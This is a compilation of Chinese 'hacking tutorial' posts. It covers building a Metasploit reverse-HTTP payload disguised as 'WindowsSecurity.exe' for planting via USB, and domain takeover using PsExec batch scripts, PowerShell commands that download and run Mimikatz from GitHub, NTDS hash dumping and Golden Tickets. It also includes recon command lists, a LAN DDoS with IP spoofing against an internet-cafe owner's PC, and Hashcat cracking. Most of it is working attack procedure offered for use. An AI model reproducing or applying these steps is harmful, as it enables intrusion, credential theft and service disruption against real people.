finstall最后,以root身份运行这个最新创建的“msfinstall”文件来安装metasploit。差不多两分钟,metasploit就安装完成了。在我的debain9VPS服务器上,这个安装脚本没有报错。在其他发行版中安装metasploit,请查看metasploit开发者Rapid7的官方安装指南。Step4在VPS中安装Screen程序这个程序允许用户在一个控制台下管理多个终端会话。它能够分离或者关闭终端窗口,而不会丢失终端中运行的任何数据。比如,VPS上的SSH会话关闭之后,metasploit需要继续运行。一般情况下,如果metasploit启动了,只要SSH会话一关闭,VPS上的metasploit就会停止运行。所以我们需要使用Screen工具来保持metasploit在后台运行。以下就是一个案例,我在Screen程序中保持着nano运行。要安装这个程序,使用apt-get命令即可,命令如下:sudoapt-getinstallscreen查看当前的Screen会话,使用screen-list命令。如果后台中没有在运行的Screen会话,这条命令会显示“nosocketsfound”。要开启一个新的Screen会话,只要在终端中输入screen,回车即可。Screen程序会显示一些版权和证书信息。接着按回车键,不用管它。一旦进入到会话中,终端里执行的一切都会被保存,即使你关闭终端或者关闭计算机。-r参数可以用来重新连接一个正在运行的Screen会话。session-r会话名称只要学会了上面几条简单地命令,你就可以开始使用Screen并且管理会话了。要想对Screen有更深入的了解,请参考这篇文章。Step5配置metasploitmetasploit内置了很多“资源脚本”来完成自动化操作。这对于长期使用metasploit而且不想反复的输入相同的命令来设置metasploit的黑客来说,这一点是非常便利的。创建资源脚本,在VPS上使用nano命令创建一个文件,命令如下;nano~/automate.rc这将会在家目录中创建一个“automate.rc”文件,然后把下面的命令复制粘贴到打开nano的终端中:usemulti/handlersetpayloadwindows/meterpreter/reverse_httpsetLHOSTYour.VPS.IP.HeresetLPORT80setExitOnSessionfalsesetEnableStageEncodingtrueexploit-j在进一步讲解之前,我们先来对这个脚本进行分析一下,看它是什么意思。payload类型选择的是“Windows/metepreter/reverse_http”,这会在目标靶机和攻击者之间建立HTTP连接。攻击者有时候会使用基于标准TCP连接的HTTP连接来绕过DPI(深度数据包检测)。TCP包传输到异常端口(如4444,55555等),这样的话,任何人只要监控被入侵主机的进出流量,就可以发现TCP包。LHOST是攻击者的IP地址,运行着metasploit。资源文件中的你的VPS地址也应该相应地改成攻击者的VPS地址。LPORT制定了一个目标端口。HTTP数据默认是通过80端口传输的。为了被动的绕过DPI,我们使用了80端口。当你使用msfconsole运行automate.rc文件时,这个exploit将会自动启。当你复制了上面引号中的命令,粘贴到了nano中,输入Ctrl+X,然后Y来保存和关闭nano。现在可以使用下面这条命令来启动msfconsole了。screenmsfconsole-r~/automate.rcStep6生成payloadmsfvenom是msfpayload和msfencode的组合,把这两个工具集成在一个框架中。msfvenom是metasploit框架的命令行实例,用来生成和输出metasploit中所有有效的shellcode。大多数情况下,原生的shellcode需要进行编码,这样才能正常运行。在本次测试中,我们将使用一个简单而不复杂的payload。在真实的场景中,攻击者会使用高级的payload,能够有效的绕过杀毒软件。如果在攻击过程中没有杀毒软件的话,那么,一个简单地msfvenompayload就足够了。在本教程中,我们会使用kali上的工具来生成msfvenompayload。使用msfvenom生成payload,在终端中输入以下命令:msfvenom--encodercmd/powershell_base64--payloadwindows/meterpreter/reverse_httpLHOST=YourVpsIpHereLPORT=80--archx86--platformwin--formatexe--out~/'WindowsSecurity.exe'上面这条命令执行了很多操作,现在我们来进行分析。·–encoder:这个参数会对payload进行编码,它会将原始payload的文件特征改变成不同的格式,以此来绕过入侵检测系统。这里使用的encoder类型是“powershell_base64”。powershell是一门脚本语言,是由微软开发的,旨在帮助IT专业人员配置系统和自动化管理任务。这门语言在2006年引入了WindowsXP和Vista系统中,不过自从引入起,该语言就被攻击者恶意利用来实现他们的目的。·–payload:这里使用的payload类型是“windows/meterpreter/reverse_http”。这个payload与上一步创建的资源文件automate.rc中使用的payload保持一致。LHOST:这里填写的是攻击者服务器的IP地址。这个IP地址跟上一步中automate.rc资源文件中的LHOST保持一致。LPORT=80:指定目标端口,与上一步保持一致。·–archx86:过去的Windows旧电脑使用x86架构,而且不能执行64位的程序。在较新版的Windows电脑中,可以使用x86架构,也可以使用x64架构。因此攻击者选择使用x86架构,因为新旧版本都支持,所以能够覆盖到更多的Windows用户。·–platformwin:指定目标操作系统平台。其他平台包括Android,macOS,Unix和Solaris。在这例子中,我们选择Windows平台。·–formatexe:指定输出格式为“exe”。这个可执行程序可以不需要用户输入就在Windows上运行。·–out:攻击者通常会使用可信的名字来命令病毒或者后门,比如“Windowssecurity”,“Windowsupdate”或者是“explorer.exe”,以此来迷惑用户,认为正在运行的进程是无害的或者可疑的。–out指定了可执行payload的名字。Step7制作payloadUSB生成msfvenompayload之后,我们需要将它保存在第二块USB中。我们只要将第二个U盘插入到电脑中,把刚刚生成的payload拷贝进去就行。就是这么简单,这个payloadU盘就制作好了。接下来就要准备去入侵系统了。在这篇文章中,我们创建了liveUSB,安装了metasploit,并且配置了远程服务器,生成了一个简单地msfvenompayload。所有这些步骤完成之后,我们就可以进行下一步了,物理上去接触一台关机的电脑,并且关闭了Windowsdefender和其他安全软件,并将payload嵌入到设备中。这样一来,每次当设备重启时,payload就会执行,在攻击者服务器和被入侵电脑中创建一个新的连接。详细步骤,敬请期待下篇文章分析。

黑客教程

在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了,在学习域渗透之前,我们需要了解一些基础知识,本期“安仔课堂”,ISEC实验室的秦老师为大家一一讲解。一、什么是域将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和安全数据库。图1那么域网络结构有什么优点呢?域的优点主要有以下几个方面:1、权限管理比较集中,管理成本降低域环境中,所有的网络资源,包括用户均是在域控制器上维护的,便于集中管理,所有用户只要登入到域,均能在域内进行身份验证,管理人员可以较好的管理计算机资源,管理网络的成本大大降低;同时在域环境中也可以防止企业员工在域成员主机上违规安装软件,增强客户端安全性,减少客户端故障,降低维护成本。2、保密性加强有利于企业的一些保密资料的管理,可以单独对资源进行权限控制,允许或拒绝特定的域账户对资源的请求。3、安全性加强使用漫游账户和文件夹重定向,个人账户的工作文件及数据等可以存储在服务器上,进行统一备份及管理,使用户的数据更加安全有保障;同时域控制器能够分发应用程序、系统补丁,用户可以选择安装,也可以由系统管理员指派自动安装,数据及系统安全性大大提高。4、提高了便捷性可由管理员指派登陆脚本映射,用户登录后就可以像使用本地盘符一样,使用网络上的资源,且不需要再次输入密码。基于以上原因,很多企业的内网均会采用域环境,所以作为一名合格的渗透测试人员,域渗透的常规思路和技巧要熟练掌握。二、域的特性域成员计算机在登录的时候可以选择登录到域中或此计算机,登陆到域中的时候,身份验证是采用Kerberos协议在域控制器上进行的,登陆到此计算机则是通过SAM来进行NTLM验证的,如下图:图2默认情况下,域用户可以登录到域中所有的工作站,不包括域控制器,管理员也可以指定具体的计算机,域用户信息保存在活动目录中,如下图:图3三、域渗透思路一个具有一定规模的企业,每天都可能面临员工入职和离职,因此网络管理部门经常需要对域成员主机进行格式化消除磁盘的文件,然后重装系统及软件,以提供给新员工使用;因此,为了便于后期交接,大多网络管理员会做好一个系统镜像盘,统一安装所有的电脑,并且在安装的时候设置惯用、甚至统一的密码。因此,域中的计算机本地管理员账号,极有可能能够登陆域中较多的计算机,本地管理员的密码在服务器上后期修改的概率,远低于在个人办公电脑上的概率,而域用户权限是较低的,是无法在域成员主机上安装软件的,这将会发生下面的一幕:某个域用户需要使用viso软件进行绘图操作,于是联系网络管理员进行安装,网络管理员采用域管理员身份登录了域成员主机,并帮助其安装了viso软件,于是这个有计算机基础的员工,切换身份登录到了本地计算机的管理员,后执行mimikatz,从内存当中抓取了域管理员的密码,便成功的控制了整个域。  因此,域渗透的思路就是:通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。四、域渗透常用指令以下所有指令均为在域成员主机上执行的结果。得到域控制器的IP:dsqueryserver图4得到域控制器主机名:netgroup“domaincontrollers”/domain,注意通过该指令得到的机器名后面会多一个$符号,如下图:图5查询域管理用户:netgroup“domainadmins”/domain图6查看所有域用户:netuser/domain图7这里有一个特殊用户叫做krbtgt,该用户是用于Kerberos身份验证的帐户,获得了该用户的hash,就可以伪造票据进行票据传递攻击了,此外,还有以下几个常用指令:查询当前登陆域:netconfigworkstation查询域密码策略:netaccounts/domain查看补丁信息:wmicqfe查看操作系统类型:wmicos当我们获得了某个本地管理员权限的账号,我们想通过该账号访问内网其他主机,常用的做法有netuse建立Ipc$连接、wmic指令连接、采用rdp方式连接、当然也可以使用“计算机管理–连接到另一台计算机”的功能来进行操作,除此之外,笔者更喜欢使用psexec进行远程连接,如下图:图8如果觉得一台一台手工连接比较麻烦,也可以进行批量连接,批量反弹cmdshell回来,可以采用如下批处理:@echooffechocheckipaddrconfigfile…ifnotexistip.txtechoipaddrconfigfileip.txtdoesnotexist!&gotoendechoreadandanalysisfile…for/F“eol=#”%%iin(ip.txt)dostartPsExec.exe\\%%i-accepteula-uadministrator-p“123456″cmd&startcmd/cPsExec.exe\\%%i-uadministrator-p“123456″cmd:endexit图9当返回了cmdshell后,我们就可以逐一读取内存,去抓取域管理员的密码,这里可以结合powershell来进行快速操作,无需上传文件:抓明文:powershellIEX(New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1′);Invoke-Mimikatz–DumpCerts抓hash:powershellIEX(New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1′);Get-PassHashes这种方式的好处是只要域管理员登陆过目标计算机,即使注销了会话,一样可以从内存读取到密码,但实际的渗透过程中,我们往往追求的是效率,如何快速找到域管理员登陆过哪台计算机,并且还存在活动会话,优先级更高一些,我们可以使用如下指令:图10这里ip.txt是需要遍历的IP列表,1.bat中的指令为tasklist/v|find“域管理员”,这样我们只需要在返回的cmdshell当中,去查看是否含有域管理员字样的会话,如果有,则表示该主机上曾经登陆过域管理员,可以去dump内存密码了。另外我们也可以使用Tasklist命令查看远程主机任务列表,这里一样是搜索含有域管理员字样的任务列表,如下图:图11基于以上原理,我们可以写一个更加自动化的批处理:@echooffechocheckipaddrconfigfile…ifnotexistip.txtechoipaddrconfigfileip.txtdoesnotexist!&gotoendechoreadandanalysisfile…for/F“eol=#”%%iin(ip.txt)doecho%%i&(echo%%i&tasklist/s%%i/uadministrator/pmytest2010/v)>>d:\result.txt:endexit上述指令的作用就是采用指定的用户名和密码去遍历ip.txt中的IP列表,并打印任务列表,将结果输出到result.txt当中,执行完了上述批处理,我们只需要稍作等待,最后去查看result.txt当中是否含有域管理员字样,即可确定哪些主机上存在域管理员的活动会话,如下图:图12五、域用户hash提取域用户帐户以域数据库的形式保存在活动目录中,ntdsutil.exe是域控制器自带的域数据库管理工具,从windows2008就默认自带了,因此我们可以通过域数据库,提取出域中所有的域用户信息,在域控上依次执行如下命令,导出域数据库:Ntdsutil–snapshot—activateinstancentds—create—mount{guid}—copy装载点\windows\NTDS\ntds.ditd:\ntds_save.dit图13域数据库装载完毕,即可进行复制,如下图:图14最后执行unmount{guid}—delete{guid}–quit删除装载点即可,避免被发现,接着上传工具QuarksPwDump到域控制器上,然后执行如下命令,成功提取用户hash,如下图:QuarksPwDump–dump-hash-domain–ntds-filed:\ntds_save.dit图15注意上面的操作必须在域控制器上,否则会出现如下错误,这是因为打开域数据库需要用到相应的数据库引擎,如下图:图16除了上面的操作方法外,还可以使用mimikatz一条命令,获取域控制器上所有用户的hash:mimikatzlog“privilege::debug”“lsadump::lsa/patch”图17六、票据传递攻击域中每个用户的Ticket都是由krbtgt的密码Hash来计算生成的,因此只要我们拿到了krbtgt的密码Hash,就可以随意伪造Ticket,进而使用Ticket登陆域控制器,使用krbtgt用户hash生成的票据被称为GoldenTicket,此类攻击方法被称为票据传递攻击。首先,我们来生成GoldenTicket,这里需要修改相应的域管理员账号、域名称、sid值,如下图:图18接着我们使用如下指令导入票据:图19导入成功后,我们在域成员主机上执行klist,即可查看缓存的票据,如下图:图20最后,我们就可以使用票据传递攻击,登陆域控了,如下图:图21因此,在域渗透过程如果发现域管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改。此外,域渗透过程中可能会使用到MS14-068这个漏洞,微软给出的补丁是kb3011780,在server2000以上的域控中,如果没有打这个补丁,那么情况将比较糟糕,利用该漏洞可以将任何一个域用户提权至域管理员权限,危害极大。

黑客教程

内网(域)渗透–1.基本命令————————————————————————————————————ipconfig/all------查询本机IP段,所在域等netuser------本机用户列表netlocalhroupadministrators------本机管理员[通常含有域用户]netuser/domain------查询域用户netgroup/domain------查询域里面的工作组netgroup"domainadmins"/domain------查询域管理员用户组netlocalgroupadministrators/domain------登录本机的域管理员netlocalgroupadministratorsworkgroup\user001/add------域用户添加到本机netgroup"domaincontrollers"/domain------查看域控制器(如果有多台)nettime/domain------判断主域,主域服务器都做时间服务器netconfigworkstation------当前登录域netsession------查看当前会话netuse\\ip\ipc$pawword/user:username------建立IPC会话[空连接-***]netshare------查看SMB指向的路径[即共享]netview------查询同一域内机器列表netview\\ip------查询某IP共享netview/domain------查询域列表netview/domain:domainname------查看workgroup域中计算机列表netstart------查看当前运行的服务netaccounts------查看本地密码策略netaccounts/domain------查看域密码策略nbtstat–Aip------netbios查询netstat–an/ano/anb------网络连接查询routeprint------路由表=============================================================dsquerycomputer-----findscomputersinthedirectory.dsquerycontact-----findscontactsinthedirectory.dsquerysubnet-----findssubnetsinthedirectory.dsquerygroup-----findsgroupsinthedirectory.dsqueryou-----findsorganizationalunitsinthedirectory.dsquerysite-----findssitesinthedirectory.dsqueryserver-----findsdomaincontrollersinthedirectory.dsqueryuser-----findsusersinthedirectory.dsqueryquota-----findsquotaspecificationsinthedirectory.dsquerypartition-----findspartitionsinthedirectory.dsquery*-----findsanyobjectinthedirectorybyusingagenericLDAPquery.dsqueryserver–domainYahoo.com|dsgetserver–dnsname–site---搜索域内域控制器的DNS主机名和站点名dsquerycomputerdomainroot–name*-xp–limit10-----搜索域内以-xp结尾的机器10台dsqueryuserdomainroot–nameadmin*-limit----搜索域内以admin开头的用户10个…………=============================================================tasklist/V-----查看进程[显示对应用户]tasklist/Sip/Udomain\username/P/V-----查看远程计算机进程列表qprocess*-----类似tasklistqprocess/SERVER:IP-----远程查看计算机进程列表nslookup–qt-MXYahoo.com-----查看邮件服务器whoami/all-----查询当前用户权限等set-----查看系统环境变量systeminfo-----查看系统信息qwinsta-----查看登录情况qwinsta/SERVER:IP-----查看远程登录情况fsutilfsinfodrives-----查看所有盘符gpupdate/force-----更新域策略=============================================================wmicbios-----查看bios信息wmicqfe-----查看补丁信息wmicqfegethotfixid-----查看补丁-Patch号wmicstartup-----查看启动项wmicservice-----查看服务wmicos-----查看OS信息wmicprocessgetcaption,executablepath,commandlinewmicprocesscallcreate“process_name”(executesaprogram)wmicprocesswherename=”process_name”callterminate(terminatesprogram)wmiclogicaldiskwheredrivetype=3getname,freespace,systemname,filesystem,size,volumeserialnumber(harddriveinformation)wmicuseraccount(usernames,sid,andvarioussecurityrelatedgoodies)wmicuseraccountget/ALLwmicshareget/ALL(youcanuse?forgetshelp!)wmicstartuplistfull(thiscanbeahugelist!!!)wmic/node:"hostname"biosgetserialnumber(thiscanbegreatforfindingwarrantyinfoabouttarget)———————————————————————————————————————————-

2019-5-22 45 0
黑客教程

Web方面的信息收集0x02域名信息收集收集二、三等级域名信息是极为重要的,这里我列举相关工具。subDomainsBrute:https://github.com/lijiejie/subDomainsBruteGSDF:https://github.com/We5ter/GSDF等等。当然也必须要有一个强大的字典,这里我列出一些。Blasting_dictionary:https://github.com/rootphantomer/Blasting_dictionaryfuzz_dict:https://github.com/Strikersb/fuzz_dict等等。0x03巧用各大平台利用一些域名解析网站获取域名相关的注册信息,以及其它关联的域名注册信息,解析信息等等,这是基础哦~然后也可以利用QQ群、百度贴吧等交互平台查询关于企业以及员工方面的信息,当然也可以用Github这个平台进行搜索相关域名信息以及其它信息。0x04测试过程中收集在进行漏洞挖掘的过程中,养成一个信息收集的习惯是一个必要的挖掘技巧。在测试不同的平台都要进行信息收集,当然,收集这些信息不是为了进行其它用途而是为了利用这些信息去挖掘更深的潜在危害的漏洞。0x05字典收集软件是帮你自动化,其关键成功的因素,是靠你的字典全不全根据企业信息和挖掘过程中产生的信息以及网上公布的信息进行不同组合,然后在测试不同平台的时候再从其中筛选出可靠的,然后组成一个迷你的强悍字典。以上就是关于Web方面的信息收集思路。App方面的信息收集0x01利用不同App市场在大家想要测试App问题的时候,思路要扩大化,不管App是否还维护只要还在线上,只要域名还可以访问,那么就要去进行测试,大家要学会找在不同平台搜索App,然后凭借自己对企业的了解去找到潜在的相关App因为一些App并不是以企业昵称命名的,比如你在安卓市场搜索企业相关App,然后你再去小米应用市场进行搜索企业相关App可能你就会发现又搜索出来了几个新的App,因为一个App平台并不会包含企业以前和现在的所有App,所以要去不同的App市场进行收集App。0x02本地App域名提取一些比较隐私性的域名可能会包含在APP本地文件当中,比如某内部员工登录系统的APP,但是由于有证书校验,你也抓不到数据包此时你可以查看该APP的本地文件,然后就可看到本APP内调用的是哪些域名,然后还有相关的域名从APP内提取域名的相关程序很多,这里我提供一个某作者写的Windows下的工具吧,需要Net环境哦下载地址:https://pan.baidu.com/s/1slJaYnF0x03手机端的免Root抓包工具大家可能喜欢用Burpsuite进行抓包,但配置相关证书的过程当中会很不顺利,或者有时抓不到相关信息那么我推荐一款工具,免Root抓包工具,可以抓Https的数据包下载地址:https://pan.baidu.com/s/1jKou83W密码:rh5i以上就是关于App方面的信息收集总结:信息的收集就是挖掘漏洞的一个基础步骤,学会在不同方向进行信息收集是决定你能否挖掘出漏洞的一个关键因素0x01利用搜索引擎收集利用搜索引擎进行收集相关域名信息以及其它信息,是极为重要的。「搜索引擎的语法」是你必须掌握的一点,这里我就不再列出来,直接附上一位博主的语法解释文章:传送门在这里我推荐一些相关的搜索引擎:谷歌搜索由于某些原因,所以不能正常访问,这里你可以代理vpn,修改Host,或者访问镜像网站,关于谷歌镜像,我列出一些网址:①:http://ac.scmor.com②:https://coderschool.cn/1853.html③:https://www.zizaifan.com/html/google.htmlBaidu搜索:https://www.baidu.comПекин搜索:https://yandex.rucrt.sh搜索:https://crt.shnosec搜索:https://nosec.orgBing搜索:https://cn.bing.com中国搜索:http://www.chinaso.com等等。

黑客教程

之前我们说过了局域网攻击,这篇教程就教你如何实战。像网吧或者是公司的网络都是通过一根主网线接入到交换机。再从交换机把网络送到每一台的电脑像这样的网络环境就属于局域网。他们的外网IP地址是共用的内网地址分配如下:我这边的话连接的设备少,就看不出什么IP的分布规律。像公司或者是网吧的话,就会显示很多个IP地址。那下面我们就来进行实战局域网压力测试。我们需要用到的工具有:幽灵伪装,主要用于来伪装内网IP,比如1号机的IP地址是:192.168.0.1,2号机的IP地址是:192.168.0.2,那我是1号机我就把我的IP伪装成2号机的IP,让他们误以为是2号机在发动攻击。局域网ddos,这个软件主要是用来扫描内网所有存活的主机数量,以及用于发起DDOS攻击。1.首先我们先打幽灵伪装的文件夹然后先安装dll文件在打开幽灵攻击伪装。选择网卡打个1按回车键。我的IP地址是:192.168.0.37,然后在伪装IP地址哪里填写你要伪装的IP地址我填写的是192.168.0.154然后按回车显示伪装成功就是弄好了。2.然后我们安装局域网攻击文件夹里面的dll文件,在打开局域网ddos软件下拉选择网卡点击扫描就会显示局域网里面的所有主机,像我这边的话第一台就是网吧老板的主机了我们来攻击试试3.先填写MAC欺骗地址双击选择主机然后直接攻击,MAC地址不会填的复制我的就行:1x2x3a4e5e91,我直接攻击的是网吧老板的那台电脑主机,我们可以用ping命令查看攻击效果,我这边的话没攻击多久就显示请求超时断网了。我不敢攻击太久我怕被老板发现我就要躺着出网吧了。

黑客教程

一个口令是最好的描述可能是对象的验证,或认证工具。口令通过认证和允许,来检验用户访问的合法性和正确性,一个口令被用在很多地方:你需要口令访问你的邮箱,你需要口令拨号链接你的Interet服务提供商,在企业内,你需要输入口令启动一个系统。所有的地方,都利用用户名和口令来对用户进行认证。用户名被用于识别用户,口令被用于为每一个唯一的用户名提供认证,每个用户名只有唯一的一个口令。举个锁和钥匙的例子,每一把锁需要配唯一的一把钥匙,因此,锁是用户名,口令是钥匙,口令就与你房间的钥匙一样重要。当只有你自己拥有钥匙时,你的房间才十分的安全,相似的,在口令的背后的概念,就是拥有口令的人知道口令,而其他人不知道,每天,我们都听到有关口令被盗,电脑被破解等消息。有时,用户会选择非常容易的口令,使得黑客可以非常容易地破解这些口令。这里有一些指导建议,当你选择口令时,你需要牢记这些建议:1、用户名与口令不同。2、不要选择你自己的名字,生日,爱人姓名,宠物名,孩子姓名等作为你的口令,这些是攻击者首先尝试的。3、一些人非常懒惰将他们的口令设为“输入”(回车).4、选择一个不是字典内的单词,同时要包含数字和字母。尽可能地使用大小写字母,并使用一些像(#,S,%,)的符号,这样的口令只能通过暴力口令破解了.你可以选择一个较差的口令,但会更加容易遭到破解攻击。在认证过程中,最薄弱的环节是我们自己,人们有时会按照以上的要求来设置口令,这些较好的口令不容易记住。有时人们会将口令记录在一张纸上或将它贴在他们的显示器上。如果需要保持系统的安全,最好的方法是记住这些口令,健盘的底部、CPU的后部和显示器的旁边可能是最有可能发现口令的地方,针对不同的服务,人们很难记住许多的口令,因此,他们使用相同的口令,知道一个口令就有可能破解其他的口令最普通的口令破解方法是猜测,尽管这需要运气,但是有时会成功的。为了开始猜测口令,你首先需要收集一些受害者的各种信息,最常用的和最成功的对口令进行破解的方法是使用口令破解器,什么是口令破解器?但是,首先你需要知道一个人是如何认证的。当你创建一个新的账户或注册,或运行安装(一般情况下,,无论何时在创建一个新的账户;输入一个用户名和口令),你可能被要求输入用户名和口令。用户名通常是用明文储存的,但是口令是用加密的形式储存的。这里,当你输入口令,通过一个预先设定的算法加密,然后储存在硬盘上,因此,下一次当你使用账户,并输入口令时,文本(口令)输入通过相同的算法,与存储的口令比较,如果能够正确的匹配,用户认证通过,否则认证失败。用来对口令进行加密的算法是单向加密算法。因此,如果我们通过反向算法,不能恢复加密口令的明文内容。例如,你的口令的明文是xyz123,它通过加密算法,作为0101027AF储存在文件中。现在,如果你得到加密的口令,同时知道从xy2123转化为0101027AF的算法,你也不能通过反向算法从0101027AF得到口令xyz123,当你输入口令时,电脑不会显示明文,而只会用*号代替,即******,因此别人使用肩窥技术,他不能发现口令。文本框已经用这种方式进行编程了,在大多数的unix模式下:我们可能看不到星号的标记,光标不能移动,为了防止别人的肩窥,也使得别人不能观察到口令的长度。口令破解有两种类型:基于暴力破解和基于字典破解基于字典的口令攻击者会基于特定的字典列表尝试所有的口令进行破解,这种破解口令速度较快,但是有时不能成功地找到口令。由于不能尝试所有的按键组合,他们不能够含有符号和数字的口令。暴力破解攻击者尝试按键的所有组合(即符号、数字和学母),包括太小字母的组合。这样的口令破解者有非常大的成功几率,但是需要消耗很多的时间,由于他们考虑了所有可能的按键组合,他们非常有效。当口令通过单向加密的算法进行加密,口令破解者不能从文件中提取口令,但是字母的组合,对字符进行加密,并通过原来的加密算法进行加密,然后将加密值与储存值进行比较。如果两者匹配,口令破解工具将会以明文的方式显示口令。

黑客教程

本文介绍了建议密码建议规则中介绍的技术的替代工具。它使用Hashcat代替开源的JohntheRipper。Hashcat可以免费使用,但它的源代码不可用。首先查看上一篇文章。您需要它包含的四个示例哈希文件。然后返回此处使用Hashcat运行相同的蛮力。定义自定义字符集我们将使用三个Hashcat预定义的字符集来为我们的猜测构建字母数字种子。它们是小写(?l),大写(?u)和数字(?d)。我们只需要一个自定义字符集,我们将使用该-1选项指定(选项的长名称--custom-charset1)。确保用单引号括起charset字符串,否则shell可能会误解问号。此示例使用64位hashcat-cli64.app用于OSX;Linux或Windows二进制文件的选项相同。-1'?l?u?d'定义一个面具您可以通过命令行选项创建掩码。自定义字符集是第一个,即?1。(?l在这种情况下不要与小写混淆。)我们希望建立三元组。所以第一步是根据charset1创建一个包含三个字符的掩码,如下所示:‘?1?1?1’实际上,该掩码将产生长度为一,二和三个字符的猜测。我们只关心字母数字三元组,因此我们将使用该--pw-min选项指定最小密码长度为3。使用--stdout选项验证输出。$./hashcat-cli64.app--stdout-m0-a3-1'?l?u?d'--pw-min=3'?1?1?1'|lessaaabaacaadaaeaafaagaahaaiaa现在为完整格式创建一个掩码。它应该是由破折号分隔的四组字母数字三元组。使用?1占位符引用-1选项中定义的自定义字符集。'?1?1?1-?1?1?1-?1?1?1-?1?1?1'验证面具。$./hashcat-cli64.app--stdout-m0-a3-1'?l?u?d'--pw-min=15'?1?1?1-?1?1?1-?1?1?1-?1?1?1'|lessaaa-aaa-aaa-aaabaa-aaa-aaa-aaacaa-aaa-aaa-aaa开始猜测使用该-m选项选择散列算法。到目前为止,我们一直在使用类型0,它对应于MD5。$./hashcat-cli64.app-m0-a3-1'?l?u?d'--pw-min=15safari_md5.txt'?1?1?1-?1?1?1-?1?1?1-?1?1?1'Initializinghashcatv0.47byatomwith8threadsand32mbsegment-size...Addedhashesfromfilesafari_md5.txt:8(1salts)现在尝试使用SHA-256哈希函数,即模式1400。$./hashcat-cli64.app-m1400-a3-1'?l?u?d'--pw-min=15safari_sha256.txt‘?1?1?1-?1?1?1-?1?1?1-?1?1?1'Initializinghashcatv0.47byatomwith8threadsand32mbsegment-size...Addedhashesfromfilesafari_sha256.txt:8(1salts)注意由于目标散列方法导致的破解速度的差异。具体数字因系统而异,但您可能会看到单词/秒。从MD5切换到SHA-256时,降为一半。这种丢弃是理想的,因为它会影响攻击者迭代猜测所需的工作因素(在时间和计算资源上测量的工作量)。如果密码哈希列表被盗,您希望哈希算法具有较高的工作因子。还有其他方法,如盐析和像PBKDF2这样的算法,也可能会增加工作因素。散列算法的选择不能有效地保护弱密码,无论它们是短密码(squ!d),使用小字符集(8675309),还是基于常用单词或短语(221bBakerStreet)的较长密码。换句话说,最好的安全性是防止密码的散列版本首先被盗。

2019-5-5 90 0